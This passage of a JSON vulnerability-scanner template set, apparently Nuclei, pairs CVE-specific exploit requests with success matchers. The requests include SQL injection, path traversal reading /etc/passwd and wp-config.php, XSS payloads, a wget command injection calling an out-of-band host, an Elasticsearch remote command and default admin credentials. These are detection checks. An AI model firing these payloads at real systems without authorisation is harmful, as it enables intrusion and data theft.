HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script><\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Horde :: User Administration</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-4385","info":{"name":"Cofax <=2.0RC3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>\"</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(<a href=\"/names\\.nsf/[0-9a-z\\/]+\\?OpenDocument)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=confirm('xss')>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name &amp; password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-1669","info":{"name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4926","info":{"name":"Adminimize 1.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5179","info":{"name":"Skysa App Bar 1.04 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4618","info":{"name":"Advanced Text Widget < 2.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"</script><script>alert(document.domain)</script>\")","contains(body_1, \"Advanced Text Widget\")"],"condition":"and"}]}]},{"id":"CVE-2011-3315","info":{"name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5107","info":{"name":"Alert Before Your Post <= 0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5252","info":{"name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-5265","info":{"name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5106","info":{"name":"WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4624","info":{"name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4804","info":{"name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2744","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-0049","info":{"name":"Majordomo2 - SMTP/HTTP Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2780","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5181","info":{"name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4336","info":{"name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5111","info":{"name":"Fonality trixbox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3206","info":{"name":"Seagate BlackArmor NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"unsafe":true,"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2014-9607","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9618","info":{"name":"Netsweeper - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"","placeholder=\"Profile Manager\">","<title>Netsweeper WebAdmin</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9614","info":{"name":"Netsweeper 4.0.5 - Default Weak Account","severity":"critical"},"requests":[{"raw":["POST /webadmin/auth/verification.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/webadmin/start/\n\nlogin=branding&password=branding&Submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: ../common/","Location: ../start/"],"condition":"or"},{"type":"word","part":"header","words":["Set-Cookie: webadminU="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2014-8682","info":{"name":"Gogs (Go Git Service) - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"ok\":true","\"data\"","\"repolink\":\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9444","info":{"name":"Frontend Uploader <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4561","info":{"name":"Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3120","info":{"name":"ElasticSearch v1.1.1/1.2 RCE","severity":"medium"},"requests":[{"raw":["POST /_search?pretty HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n    \"script_fields\": {\n        \"command\": {\n            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n        }\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9615","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5368","info":{"name":"WordPress Plugin WP Content Source Control - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3704","info":{"name":"Drupal SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/?q=node&destination=node"],"body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PDOException","{{md5({{num}})}}"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2014-4942","info":{"name":"WordPress EasyCart <2.0.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2014-9119","info":{"name":"WordPress DB Backup <=4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2962","info":{"name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4550","info":{"name":"Shortcode Ninja <= 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4535","info":{"name":"Import Legacy Media <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4558","info":{"name":"WooCommerce Swipe <= 2.7.1 - Cross-Site 